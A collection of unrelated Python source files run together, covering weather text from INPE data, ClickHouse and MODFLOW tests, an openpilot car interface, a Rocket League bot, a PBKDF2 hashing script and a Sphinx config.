previsao_texto = "Hoje o tempo está " + get_descricao_tempo_by_sigla(previsao_hoje['tempo'])
previsao_texto += ", a temperatura máxima é de " + previsao_hoje['maxima'] + ' graus'
previsao_texto += ", a minima é de " + previsao_hoje['minima'] + " graus celsius"
previsao_texto += ", essa é a previsão para " + clima['cidade']['nome']
previsao_texto += ", informações do INPE"
return previsao_texto
def get_descricao_tempo_by_sigla(sigla):
return siglas_tempo[sigla]
siglas_tempo = {
"ec": "Encoberto com Chuvas Isoladas",
"ci": "Chuvas Isoladas",
"c": "Chuva",
"in": "Instável",
"pp": "Poss. de Pancadas de Chuva",
"cm": "Chuva pela Manhã",
"cn": "Chuva a Noite",
"pt": "Pancadas de Chuva a Tarde",
"pm": "Pancadas de Chuva pela Manhã",
"np": "Nublado e Pancadas de Chuva",
"pc": "Pancadas de Chuva",
"pn": "Parcialmente Nublado",
"cv": "Chuvisco",
"ch": "Chuvoso",
"t": "Tempestade",
"ps": "Predomínio de Sol",
"e": "Encoberto",
"n": "Nublado",
"cl": "Céu Claro",
"nv": "Nevoeiro",
"g": "Geada",
"ne": "Neve",
"nd": "Não Definido",
"pnt": "Pancadas de Chuva a Noite",
"psc": "Possibilidade de Chuva",
"pcm": "Possibilidade de Chuva pela Manhã",
"pct": "Possibilidade de Chuva a Tarde",
"pcn": "Possibilidade de Chuva a Noite",
"npt": "Nublado com Pancadas a Tarde",
"npn": "Nublado com Pancadas a Noite",
"ncn": "Nublado com Poss. de Chuva a Noite",
"nct": "Nublado com Poss. de Chuva a Tarde",
"ncm": "Nubl. c/ Poss. de Chuva pela Manhã",
"npm": "Nublado com Pancadas pela Manhã",
"npp": "Nublado com Possibilidade de Chuva",
"vn": "Variação de Nebulosidade",
"ct": "Chuva a Tarde",
"ppn": "Poss. de Panc. de Chuva a Noite",
"ppt": "Poss. de Panc. de Chuva a Tarde",
"ppm": "Poss. de Panc. de Chuva pela Manhã"
}
|
import logging
import time
import pytest
from helpers.cluster import ClickHouseCluster
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(logging.StreamHandler())
@pytest.fixture(scope="module")
def cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("node1", main_configs=["configs/config.d/s3.xml"], macros={'replica': '1'},
with_minio=True,
with_zookeeper=True)
cluster.add_instance("node2", main_configs=["configs/config.d/s3.xml"], macros={'replica': '2'},
with_minio=True,
with_zookeeper=True)
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
yield cluster
finally:
cluster.shutdown()
def get_large_objects_count(cluster, size=100):
minio = cluster.minio_client
counter = 0
for obj in minio.list_objects(cluster.minio_bucket, 'data/'):
if obj.size >= size:
counter = counter + 1
return counter
def wait_for_large_objects_count(cluster, expected, size=100, timeout=30):
while timeout > 0:
if get_large_objects_count(cluster, size) == expected:
return
timeout -= 1
time.sleep(1)
assert get_large_objects_count(cluster, size) == expected
@pytest.mark.parametrize(
"policy", ["s3"]
)
def test_s3_zero_copy_replication(cluster, policy):
node1 = cluster.instances["node1"]
node2 = cluster.instances["node2"]
node1.query(
"""
CREATE TABLE s3_test ON CLUSTER test_cluster (id UInt32, value String)
ENGINE=ReplicatedMergeTree('/clickhouse/tables/s3_test', '{}')
ORDER BY id
SETTINGS storage_policy='{}'
"""
.format('{replica}', policy)
)
node1.query("INSERT INTO s3_test VALUES (0,'data'),(1,'data')")
time.sleep(1)
assert node1.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data')"
assert node2.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data')"
# Based on version 20.x - should be only one file with size 100+ (checksums.txt), used by both nodes
assert get_large_objects_count(cluster) == 1
node2.query("INSERT INTO s3_test VALUES (2,'data'),(3,'data')")
time.sleep(1)
assert node2.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data'),(2,'data'),(3,'data')"
assert node1.query("SELECT * FROM s3_test order by id FORMAT Values") == "(0,'data'),(1,'data'),(2,'data'),(3,'data')"
# Based on version 20.x - two parts
wait_for_large_objects_count(cluster, 2)
node1.query("OPTIMIZE TABLE s3_test")
# Based on version 20.x - after merge, two old parts and one merged
wait_for_large_objects_count(cluster, 3)
# Based on version 20.x - after cleanup - only one merged part
wait_for_large_objects_count(cluster, 1, timeout=60)
node1.query("DROP TABLE IF EXISTS s3_test NO DELAY")
node2.query("DROP TABLE IF EXISTS s3_test NO DELAY")
def test_s3_zero_copy_on_hybrid_storage(cluster):
node1 = cluster.instances["node1"]
node2 = cluster.instances["node2"]
node1.query(
"""
CREATE TABLE hybrid_test ON CLUSTER test_cluster (id UInt32, value String)
ENGINE=ReplicatedMergeTree('/clickhouse/tables/hybrid_test', '{}')
ORDER BY id
SETTINGS storage_policy='hybrid'
"""
.format('{replica}')
)
node1.query("INSERT INTO hybrid_test VALUES (0,'data'),(1,'data')")
time.sleep(1)
assert node1.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
assert node2.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"
assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"
node1.query("ALTER TABLE hybrid_test MOVE PARTITION ID 'all' TO DISK 's31'")
assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','default')"
# Total objects in S3
s3_objects = get_large_objects_count(cluster, 0)
node2.query("ALTER TABLE hybrid_test MOVE PARTITION ID 'all' TO DISK 's31'")
assert node1.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
assert node2.query("SELECT partition_id,disk_name FROM system.parts WHERE table='hybrid_test' FORMAT Values") == "('all','s31')"
# Check that after moving partition on node2 no new obects on s3
wait_for_large_objects_count(cluster, s3_objects, size=0)
assert node1.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
assert node2.query("SELECT * FROM hybrid_test ORDER BY id FORMAT Values") == "(0,'data'),(1,'data')"
node1.query("DROP TABLE IF EXISTS hybrid_test NO DELAY")
node2.query("DROP TABLE IF EXISTS hybrid_test NO DELAY")
|
#!/usr/bin/python
# SPDX-License-Identifier: MIT
import math
with open("input", "r") as file:
horizontal_positions = list(map(int, file.readline().split(",")))
cheapest = math.inf
for align in range(min(horizontal_positions), max(horizontal_positions) + 1):
fuel = sum(abs(p - align) for p in horizontal_positions)
if fuel < cheapest:
cheapest = fuel
# Alternative:
# align = int(statistics.median(horizontal_positions))
# cheapest = sum(abs(p - align) for p in horizontal_positions)
print(f"cheapest total fuel: {cheapest}")
|
from Util import *
def controls(s):
s.throttle = curve1((s.y - .63 * s.brakes * s.pyv / ((1 - s.pyv / 2300) * 3 + 1)) / 999)
s.steer = curve1(Range180(s.a - s.av / 55, 1))
s.pitch = regress(-s.i - s.iv / 17)
s.yaw = regress(Range180(s.a - s.av / 12, 1))
s.roll = regress(Range180(- s.r + s.rv / 22, 1)) * (abs(s.a) < .15)
s.boost = s.throttle > .5 and abs(s.a) < .12 and (
s.poG or abs(s.i) < .2) and abs(s.y) > 99 and s.pyv < 2260
s.powerslide = s.jump = 0
# general powerslide
if s.throttle * s.pyv >= 0 and s.av * s.steer >= 0 and s.pxv * s.steer >= 0 and (
# sliding
(ang_dif(s.a, s.pva, 1) < .15 and .05 < abs(s.a) < .95) or (
# turning
s.pL[2] < 99 and .24 < abs(s.a) < .76 and s.a * ang_dif(s.a, s.av / 7, 1)) or (
# landing
s.gtime < .05 and ang_dif(s.a, s.pva, 1) < .25 and not s.kickoff)):
s.powerslide = 1
# turn 180°
if s.d2 > 400 and abs(s.a + s.av / 2.25) > 0.45:
if abs(s.a) > 0.98:
s.steer = 1
if s.d2 > 600 and s.pyv < -90:
if (abs(s.a) < 0.98 and abs(s.av) > 0.5 and
ang_dif(s.a, s.pva, 1) < .25):
s.powerslide = 1
s.steer = -sign(s.steer)
elif s.d2 > 800 and abs(s.a) < 0.95 and s.pyv < 1000:
s.throttle = 1
# three point turn
if (s.poG and 20 < abs(s.x) < 400 and abs(s.y) < 200 and .35 < abs(s.a) < .65
and abs(s.pyv) < 550 and abs(s.yv) < 550):
s.throttle = -sign(s.throttle)
s.steer = -sign(s.steer)
# general jump
if (s.z > 140 and s.tojump and (
# flying jump
(s.z < (200 * s.jcount + s.pB / 2) * s.dT * 2 and s.d2pv < 99)
or # directly below the ball
(s.z < s.jcount * 250 + s.pB * 10 and s.d2pv < 100 and s.vd2 < 150))):
s.jumper = 1
# jumping off walls
if ((s.z > 1350 or ((s.d < s.z * 1.5 or s.vd < 400) and s.pL[2] < 500
and abs(s.a) < .15 and s.bL[2] < 500)) and s.poG and
s.pL[2] > 60 and (abs(0.5 - abs(s.a)) > 0.25 or s.d > 2500)) or (
s.poG and s.pL[2] > 1900 and s.d2pv < 120):
s.jump = 1
# flip
if (s.flip and s.d > 400 and ang_dif(s.a, s.pva, 1) < .06 and s.pB < 80 and
s.pvd < 2200 and s.jcount > 0 and (s.gtime > 0.05 or not s.poG) and
not s.jumper and abs(s.i) < .2 and ((s.pyv > 1640 and s.ty - s.yv / 4 > 3500)
or (abs(s.a) > 0.75 and abs(s.ty - s.yv / 6) > 850 and s.pyv < -140)
or (s.pyv > 1120 and s.ty - s.yv / 4 > 3000 and s.pB < 16)
or (2000 > s.pyv > 970 and s.ty - s.pyv / 4 > 1650 and s.pB < 6))):
s.dodge = 1
s.djL = 's.tL'
# jump for wavedash
if (s.d > 550 and 950 < (s.ty - s.yv / 2) and ang_dif(s.a, s.pva, 1) < .02
and abs(s.i) < 0.1 and s.pL[2] < 50 and s.poG and s.pB < 40 and
1050 < s.pvd < 2200 and s.gtime > .1 and s.wavedash):
s.jump = 1
# forward wavedash
if (s.jcount > 0 and s.pL[2] + s.pV[2] / 20 < 32 and abs(s.r) < 0.1 and
abs(s.a) < 0.04 and s.y > 400 and 0 < abs(s.pR[0] / U) < 0.12 and
not s.poG and s.pV[2] < -210 and s.wavedash):
s.jump = 1
s.pitch = -1
s.yaw = s.roll = 0
if s.shoot:
dodge_hit(s)
# handling long jumps
if s.jumper and s.jcount > 0:
s.jump = 1
if not s.poG and (s.ljump != s.lljump or not s.ljump):
s.pitch = s.yaw = s.roll = 0
if 0.19 < s.airtime and s.z + s.zv / 12 > 120:
s.jump = not s.ljump
# handling pre-dodge
if s.dodge and s.jcount > 0:
s.jump = s.poG or s.z > 0
if 0.08 < s.airtime and s.pL[2] > 45:
exec("s.dja = dodge_ang(s, " + s.djL + ")")
s.jump = not s.ljump
s.pitch = abs(s.dja) * 2 - 1
s.yaw = (abs(Range180(s.dja + .5, 1) * 2) - 1) * .9
s.roll = 0
s.djT = s.time
# handling post-dodge
if 0.05 < s.djtime < 0.25:
s.pitch = s.roll = s.yaw = 0
if 0.25 < s.djtime < 0.65:
if abs(s.a) < 0.5:
if abs(s.a) < 0.8:
s.pitch = -sign(s.iv)
else:
s.pitch = s.yaw = s.roll = 0
if not s.index:
0
def dodge_hit(s):
d2pv = d2(s.tL - s.pL - s.pV * (s.dT + .1))
# dodge hit
if (d2pv < 99 and abs(s.tL[2] - s.pL[2]) < 110 and s.bd < 1299):
# dodge to shoot
if (s.offense and (abs(s.glinex) < 650 or Range180(s.gta - s.gpa, 1) < .01)
# dodge to clear
or ((not s.offense or abs(s.a) > .8) and abs(s.oglinex) > 1400)
# dodge for
or s.kickoff):
s.dodge = 1
s.djL = 's.bL + s.bV/60'
def dodge_ang(s, tL):
L = tL - s.pL
yaw = Range180(s.pR[1] - U / 2, U) * pi / U
x, y = rotate2D(L[0], L[1], -yaw)
a = math.atan2(y, x)
return Range180(a / pi - .5, 1)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# bittrex_websocket/summary_state.py
# Stanislav Lazarov
from time import sleep
from bittrex_websocket.websocket_client import BittrexSocket
if __name__ == "__main__":
class MyBittrexSocket(BittrexSocket):
def on_open(self):
self.client_callbacks = ['updateSummaryState']
def on_debug(self, **kwargs):
pass
def on_message(self, *args, **kwargs):
print(args)
tickers = ['BTC-ETH', 'ETH-1ST', 'BTC-1ST', 'BTC-NEO', 'ETH-NEO']
ws = MyBittrexSocket(tickers)
ws.run()
for i in list(range(10)):
sleep(1)
ws.stop()
|
import os
import pytest
import sys
import numpy as np
try:
import pymake
except:
msg = "Error. Pymake package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install https://github.com/modflowpy/pymake/zipball/master"
raise Exception(msg)
try:
import flopy
except:
msg = "Error. FloPy package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install flopy"
raise Exception(msg)
from framework import testing_framework, running_on_CI
from simulation import Simulation
ex = [
"maw_iss305a",
"maw_iss305b",
"maw_iss305c",
"maw_iss305d",
"maw_iss305e",
"maw_iss305f",
]
exdirs = []
for s in ex:
exdirs.append(os.path.join("temp", s))
ddir = "data"
cmppth = "mf2005"
paktest = "maw"
require_failure = [True for i in range(len(exdirs))]
require_failure[0] = False
# set travis to True when version 1.13.0 is released
continuous_integration = [True for n in ex]
# set replace_exe to None to use default executable
replace_exe = None
# temporal discretization
nper = 2
perlen = [0.0, 365.0]
nstp = [1, 25]
tsmult = [1.0, 1.1]
steady = [True, False]
# spatial discretization
nlay, nrow, ncol = 2, 101, 101
shape3d = (nlay, nrow, ncol)
size3d = nlay * nrow * ncol
xlen = 1000.0
common_ratio = 1.01
nhalf = int(0.5 * ncol) + 1
first_term = 0.5 * xlen / ((1 - common_ratio**nhalf) / (1 - common_ratio))
delr = np.zeros((ncol), dtype=float)
for n in range(nhalf):
if n == 0:
v = first_term
else:
v = first_term * common_ratio**n
delr[nhalf + n - 1] = v
delr[: nhalf - 1] = delr[-1 : nhalf - 1 : -1]
# add error to edge cells
err = xlen - delr.sum()
delr[0] += 0.5 * err
delr[-1] += 0.5 * err
top = 0.0
botm = [-175, -350.0]
strt = 0.0
# hydraulic data
hk = 1.0
ss = 1e-5
confined = 0
chd_spd = []
chd5_spd = []
for i in range(nrow):
if i == 0 or i == ncol - 1:
for j in range(ncol):
chd_spd.append([(0, i, j), strt])
chd5_spd.append([0, i, j, strt, strt])
else:
chd_spd.append([(0, i, 0), strt])
chd_spd.append([(0, i, ncol - 1), strt])
chd5_spd.append([0, i, 0, strt, strt])
chd5_spd.append([0, i, ncol - 1, strt, strt])
# maw data
radius0 = np.sqrt(delr[nhalf] * delr[nhalf] / (8.0 * np.pi))
radius = 0.25
sradius0 = radius + 0.1
wellq = -100.0
skin_mult = [0.1, 10.0, 1.0, 0.0, -1.0, 100.0]
condeqn = ["CUMULATIVE", "SKIN", "SKIN", "SKIN", "SPECIFIED", "CUMULATIVE"]
sradius = [sradius0, sradius0, sradius0, sradius0, sradius0, radius0 * 1.5]
tdis_rc = []
for idx in range(nper):
tdis_rc.append((perlen[idx], nstp[idx], tsmult[idx]))
hclose, rclose = 1e-9, 1e-6
def build_model(idx, dir):
name = ex[idx]
ws = dir
# build MODFLOW 6 files
sim = flopy.mf6.MFSimulation(
sim_name=name, version="mf6", exe_name="mf6", sim_ws=ws
)
# create tdis package
tdis = flopy.mf6.ModflowTdis(
sim, time_units="DAYS", nper=nper, perioddata=tdis_rc
)
# create iterative model solution
ims = flopy.mf6.ModflowIms(
sim, inner_dvclose=hclose, rcloserecord=rclose, outer_dvclose=hclose
)
# create gwf model
gwf = flopy.mf6.ModflowGwf(sim, modelname=name, save_flows=True)
# discretization
dis = flopy.mf6.ModflowGwfdis(
gwf,
nlay=nlay,
nrow=nrow,
ncol=ncol,
delr=delr,
delc=delr,
top=top,
botm=botm,
)
# initial conditions
ic = flopy.mf6.ModflowGwfic(gwf, strt=strt)
# node property flow
npf = flopy.mf6.ModflowGwfnpf(
gwf, save_flows=False, icelltype=confined, k=hk
)
# storage
sto = flopy.mf6.ModflowGwfsto(
gwf,
save_flows=False,
iconvert=confined,
ss=ss,
steady_state={0: True},
transient={1: True},
)
# constant head
chd = flopy.mf6.ModflowGwfchd(
gwf, stress_period_data=chd_spd, save_flows=False
)
# multi-aquifer well
hks = hk * skin_mult[idx]
mpd = [[0, radius, botm[-1], strt, condeqn[idx], 2]]
mcd = [
[0, 0, (0, nhalf, nhalf), top, botm[0], hks, sradius[idx]],
[0, 1, (1, nhalf, nhalf), botm[0], botm[1], hks, sradius[idx]],
]
perioddata = {1: [[0, "RATE", wellq]]}
maw = flopy.mf6.ModflowGwfmaw(
gwf,
print_input=True,
no_well_storage=True,
packagedata=mpd,
connectiondata=mcd,
perioddata=perioddata,
)
# output control
oc = flopy.mf6.ModflowGwfoc(
gwf,
budget_filerecord="{}.cbc".format(name),
head_filerecord="{}.hds".format(name),
saverecord=[("HEAD", "ALL"), ("BUDGET", "ALL")],
)
# build MODFLOW-2005 files
if require_failure[idx]:
mc = None
else:
ws = os.path.join(dir, cmppth)
mc = flopy.modflow.Modflow(name, model_ws=ws, version=cmppth)
dis = flopy.modflow.ModflowDis(
mc,
nlay=nlay,
nrow=nrow,
ncol=ncol,
nper=nper,
perlen=perlen,
nstp=nstp,
tsmult=tsmult,
steady=steady,
delr=delr,
delc=delr,
top=top,
botm=botm,
)
bas = flopy.modflow.ModflowBas(mc, strt=strt)
lpf = flopy.modflow.ModflowLpf(
mc, laytyp=confined, hk=hk, vka=hk, ss=ss, sy=0
)
chd = flopy.modflow.ModflowChd(mc, stress_period_data=chd5_spd)
# mnw2
# empty mnw2 file to create recarrays
mnw2 = flopy.modflow.ModflowMnw2(mc)
node_data = mnw2.get_empty_node_data(2)
node_data["ztop"] = np.array([top, botm[0]])
node_data["zbotm"] = np.array([botm[0], botm[1]])
node_data["i"] = np.array([nhalf, nhalf])
node_data["j"] = np.array([nhalf, nhalf])
node_data["wellid"] = np.array(["well1", "well1"])
node_data["losstype"] = np.array(["skin", "skin"])
node_data["rw"] = np.array([radius, radius])
node_data["rskin"] = np.array([sradius[idx], sradius[idx]])
node_data["kskin"] = np.array([hks, hks])
dtype = [("wellid", np.unicode_, 20), ("qdes", "<f8")]
spd0 = np.zeros(1, dtype=dtype)
spd0["wellid"] = "well1"
spd1 = np.zeros(1, dtype=dtype)
spd1["wellid"] = "well1"
spd1["qdes"] = wellq
spd = {0: spd0, 1: spd1}
mnw2 = flopy.modflow.ModflowMnw2(
mc,
mnwmax=1,
node_data=node_data,
stress_period_data=spd,
itmp=[1, 1],
mnwprnt=2,
)
oc = flopy.modflow.ModflowOc(
mc,
stress_period_data=None,
save_every=1,
save_types=["save head", "save budget"],
)
pcg = flopy.modflow.ModflowPcg(mc, hclose=hclose, rclose=rclose)
return sim, mc
# - No need to change any code below
@pytest.mark.parametrize(
"idx, dir",
list(enumerate(exdirs)),
)
def test_mf6model(idx, dir):
# determine if running on CI infrastructure
is_CI = running_on_CI()
# initialize testing framework
test = testing_framework()
# build the models
test.build_mf6_models_legacy(build_model, idx, dir)
# run the test model
if is_CI and not continuous_integration[idx]:
return
test.run_mf6(Simulation(dir, require_failure=require_failure[idx]))
def main():
# initialize testing framework
test = testing_framework()
# build the models
# run the test model
for idx, dir in enumerate(exdirs):
test.build_mf6_models_legacy(build_model, idx, dir)
sim = Simulation(dir, require_failure=require_failure[idx])
test.run_mf6(sim)
return
if __name__ == "__main__":
# print message
print("standalone run of {}".format(os.path.basename(__file__)))
# run main routine
main()
|
import os
import time
from cereal import car
from common.kalman.simple_kalman import KF1D
from common.realtime import DT_CTRL
from selfdrive.car import gen_empty_fingerprint
from selfdrive.config import Conversions as CV
from selfdrive.controls.lib.events import Events
from selfdrive.controls.lib.vehicle_model import VehicleModel
from selfdrive.controls.lib.drive_helpers import V_CRUISE_MAX
GearShifter = car.CarState.GearShifter
EventName = car.CarEvent.EventName
MAX_CTRL_SPEED = (V_CRUISE_MAX + 4) * CV.KPH_TO_MS # 144 + 4 = 92 mph
# generic car and radar interfaces
class CarInterfaceBase():
def __init__(self, CP, CarController, CarState):
self.CP = CP
self.VM = VehicleModel(CP)
self.frame = 0
self.low_speed_alert = False
if CarState is not None:
self.CS = CarState(CP)
self.cp = self.CS.get_can_parser(CP)
self.cp_cam = self.CS.get_cam_can_parser(CP)
self.cp_body = self.CS.get_body_can_parser(CP)
self.CC = None
if CarController is not None:
self.CC = CarController(self.cp.dbc_name, CP, self.VM)
@staticmethod
def calc_accel_override(a_ego, a_target, v_ego, v_target):
return 1.
@staticmethod
def compute_gb(accel, speed):
raise NotImplementedError
@staticmethod
def get_params(candidate, fingerprint=gen_empty_fingerprint(), car_fw=None):
raise NotImplementedError
# returns a set of default params to avoid repetition in car specific params
@staticmethod
def get_std_params(candidate, fingerprint):
ret = car.CarParams.new_message()
ret.carFingerprint = candidate
ret.isPandaBlack = True # TODO: deprecate this field
# standard ALC params
ret.steerControlType = car.CarParams.SteerControlType.torque
ret.steerMaxBP = [0.]
ret.steerMaxV = [1.]
ret.minSteerSpeed = 0.
# stock ACC by default
ret.enableCruise = True
ret.minEnableSpeed = -1. # enable is done by stock ACC, so ignore this
ret.steerRatioRear = 0. # no rear steering, at least on the listed cars aboveA
ret.gasMaxBP = [0.]
ret.gasMaxV = [.5] # half max brake
ret.brakeMaxBP = [0.]
ret.brakeMaxV = [1.]
ret.openpilotLongitudinalControl = False
ret.startAccel = 0.0
ret.stoppingControl = False
ret.longitudinalTuning.deadzoneBP = [0.]
ret.longitudinalTuning.deadzoneV = [0.]
ret.longitudinalTuning.kpBP = [0.]
ret.longitudinalTuning.kpV = [1.]
ret.longitudinalTuning.kiBP = [0.]
ret.longitudinalTuning.kiV = [1.]
return ret
# returns a car.CarState, pass in car.CarControl
def update(self, c, can_strings):
raise NotImplementedError
# return sendcan, pass in a car.CarControl
def apply(self, c):
raise NotImplementedError
def create_common_events(self, cs_out, extra_gears=[], gas_resume_speed=-1, pcm_enable=True): # pylint: disable=dangerous-default-value
events = Events()
if cs_out.doorOpen:
events.add(EventName.doorOpen)
if cs_out.seatbeltUnlatched:
events.add(EventName.seatbeltNotLatched)
if cs_out.gearShifter != GearShifter.drive and cs_out.gearShifter not in extra_gears:
events.add(EventName.wrongGear)
if cs_out.gearShifter == GearShifter.reverse:
events.add(EventName.reverseGear)
if not cs_out.cruiseState.available:
events.add(EventName.wrongCarMode)
if cs_out.espDisabled:
events.add(EventName.espDisabled)
if cs_out.gasPressed:
events.add(EventName.gasPressed)
if cs_out.stockFcw:
events.add(EventName.stockFcw)
if cs_out.stockAeb:
events.add(EventName.stockAeb)
if cs_out.vEgo > MAX_CTRL_SPEED:
events.add(EventName.speedTooHigh)
if cs_out.cruiseState.nonAdaptive:
events.add(EventName.wrongCruiseMode)
if cs_out.steerError:
events.add(EventName.steerUnavailable)
elif cs_out.steerWarning:
events.add(EventName.steerTempUnavailable)
# Disable on rising edge of gas or brake. Also disable on brake when speed > 0.
# Optionally allow to press gas at zero speed to resume.
# e.g. Chrysler does not spam the resume button yet, so resuming with gas is handy. FIXME!
if (cs_out.gasPressed and (not self.CS.out.gasPressed) and cs_out.vEgo > gas_resume_speed) or \
(cs_out.brakePressed and (not self.CS.out.brakePressed or not cs_out.standstill)):
events.add(EventName.pedalPressed)
# we engage when pcm is active (rising edge)
if pcm_enable:
if cs_out.cruiseState.enabled and not self.CS.out.cruiseState.enabled:
events.add(EventName.pcmEnable)
elif not cs_out.cruiseState.enabled:
events.add(EventName.pcmDisable)
return events
class RadarInterfaceBase():
def __init__(self, CP):
self.pts = {}
self.delay = 0
self.radar_ts = CP.radarTimeStep
self.no_radar_sleep = 'NO_RADAR_SLEEP' in os.environ
def update(self, can_strings):
ret = car.RadarData.new_message()
if not self.no_radar_sleep:
time.sleep(self.radar_ts) # radard runs on RI updates
return ret
class CarStateBase:
def __init__(self, CP):
self.CP = CP
self.car_fingerprint = CP.carFingerprint
self.out = car.CarState.new_message()
self.cruise_buttons = 0
self.left_blinker_cnt = 0
self.right_blinker_cnt = 0
# Q = np.matrix([[10.0, 0.0], [0.0, 100.0]])
# R = 1e3
self.v_ego_kf = KF1D(x0=[[0.0], [0.0]],
A=[[1.0, DT_CTRL], [0.0, 1.0]],
C=[1.0, 0.0],
K=[[0.12287673], [0.29666309]])
def update_speed_kf(self, v_ego_raw):
if abs(v_ego_raw - self.v_ego_kf.x[0][0]) > 2.0: # Prevent large accelerations when car starts at non zero speed
self.v_ego_kf.x = [[v_ego_raw], [0.0]]
v_ego_x = self.v_ego_kf.update(v_ego_raw)
return float(v_ego_x[0]), float(v_ego_x[1])
def update_blinker(self, blinker_time: int, left_blinker_lamp: bool, right_blinker_lamp: bool):
self.left_blinker_cnt = blinker_time if left_blinker_lamp else max(self.left_blinker_cnt - 1, 0)
self.right_blinker_cnt = blinker_time if right_blinker_lamp else max(self.right_blinker_cnt - 1, 0)
return self.left_blinker_cnt > 0, self.right_blinker_cnt > 0
@staticmethod
def parse_gear_shifter(gear):
return {'P': GearShifter.park, 'R': GearShifter.reverse, 'N': GearShifter.neutral,
'E': GearShifter.eco, 'T': GearShifter.manumatic, 'D': GearShifter.drive,
'S': GearShifter.sport, 'L': GearShifter.low, 'B': GearShifter.brake}.get(gear, GearShifter.unknown)
@staticmethod
def get_cam_can_parser(CP):
return None
@staticmethod
def get_body_can_parser(CP):
return None
|
import operator
def main():
print ('Compute algorithm rank')
f = open('../data/join_results/sj.12_30.log.csv')
output_f = open('../data/join_results/sj.12_30.log.ranked.csv', 'w')
header = f.readline()
header = header.strip()
header += ',1st time,2nd time,3rd time,4th time, 1st #splits,2nd #splits,3rd #splits,4th #splits\n'
output_f.writelines(header)
line = f.readline()
while line:
data = line.strip().split(',')
duration = {}
duration['pbsm'] = float(data[9]) if float(data[9]) > 0 else 10000
duration['dj'] = float(data[13]) if float(data[13]) > 0 else 10000
duration['repj'] = float(data[17]) if float(data[17]) > 0 else 10000
duration['bnlj'] = float(data[5]) if float(data[5]) > 0 else 10000
# print (duration)
sorted_duration = sorted(duration.items(), key=operator.itemgetter(1))
# print (sorted_duration)
line = line.strip()
for sorted_entry in sorted_duration:
print (sorted_entry[0])
line += ',{}'.format(sorted_entry[0])
split_counts = {}
split_counts['pbsm'] = float(data[8]) if float(data[8]) > 0 else 10000
split_counts['dj'] = float(data[12]) if float(data[12]) > 0 else 10000
split_counts['repj'] = float(data[16]) if float(data[16]) > 0 else 10000
split_counts['bnlj'] = float(data[4]) if float(data[4]) > 0 else 10000
print (duration)
sorted_split_counts = sorted(split_counts.items(), key=operator.itemgetter(1))
# print (sorted_duration)
for sorted_entry in sorted_split_counts:
print (sorted_entry[0])
line += ',{}'.format(sorted_entry[0])
output_f.writelines('{}\n'.format(line))
line = f.readline()
output_f.close()
f.close()
if __name__ == '__main__':
main()
|
import sys
import hashlib
def check(args):
if len(args) != 2:
print("usage hashme.py <phrase>")
return False
return True
def main(phrase):
salt ='Km5d5ivMy8iexuHcZrsD'
hash_obj = hashlib.pbkdf2_hmac('sha512', phrase.encode(), salt.encode(), 200000)
print(hash_obj.hex())
if check(sys.argv): main(sys.argv[1])
|
# -*- coding: utf-8 -*-
#
# MongoDB documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 3 09:58:40 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
import sys
import os
import datetime
from sphinx.errors import SphinxError
try:
tags
except NameError:
class Tags(object):
def has(self, *args):
return False
tags = Tags()
# -- General configuration ----------------------------------------------------
needs_sphinx = '1.0'
extensions = [
'sphinx.ext.extlinks',
'sphinx.ext.todo',
]
locale_dirs = []
gettext_compact = False
templates_path = ['.templates']
exclude_patterns = []
source_suffix = '.txt'
master_doc = 'index'
language = 'en'
project = 'mut'
copyright = u'2008-{0}'.format(datetime.date.today().year)
version = '0.1'
release = '0.1'
rst_epilog = '\n'.join([
'.. |copy| unicode:: U+000A9',
'.. |ent-build| replace:: MongoDB Enterprise',
'.. |year| replace:: {0}'.format(datetime.date.today().year),
])
pygments_style = 'sphinx'
extlinks = {
'issue': ('https://jira.mongodb.org/browse/%s', '' ),
'wiki': ('http://www.mongodb.org/display/DOCS/%s', ''),
'api': ('https://api.mongodb.org/%s', ''),
'manual': ('https://docs.mongodb.org/manual%s', ''),
'gettingstarted': ('https://docs.mongodb.org/getting-started%s', ''),
'ecosystem': ('https://docs.mongodb.org/ecosystem%s', ''),
'meta-driver': ('http://docs.mongodb.org/meta-driver/latest%s', ''),
'mms-docs': ('https://docs.cloud.mongodb.com%s', ''),
'mms-home': ('https://cloud.mongodb.com%s', ''),
'opsmgr': ('https://docs.opsmanager.mongodb.com/current%s', ''),
'about': ('https://www.mongodb.org/about%s', ''),
'products': ('https://www.mongodb.com/products%s', '')
}
languages = [
("ar", "Arabic"),
("cn", "Chinese"),
("cs", "Czech"),
("de", "German"),
("es", "Spanish"),
("fr", "French"),
("hu", "Hungarian"),
("id", "Indonesian"),
("it", "Italian"),
("jp", "Japanese"),
("ko", "Korean"),
("lt", "Lithuanian"),
("pl", "Polish"),
("pt", "Portuguese"),
("ro", "Romanian"),
("ru", "Russian"),
("tr", "Turkish"),
("uk", "Ukrainian")
]
# -- Options for HTML output ---------------------------------------------------
html_theme = 'nature'
html_title = 'Mut'
htmlhelp_basename = 'MongoDBdoc'
# html_logo = sconf.logo
html_static_path = ['_static']
html_copy_source = False
html_use_smartypants = True
html_domain_indices = True
html_use_index = True
html_split_index = False
html_show_sourcelink = False
html_show_sphinx = True
html_show_copyright = True
html_sidebars = {}
# put it into your conf.py
def setup(app):
# disable versioning for speed
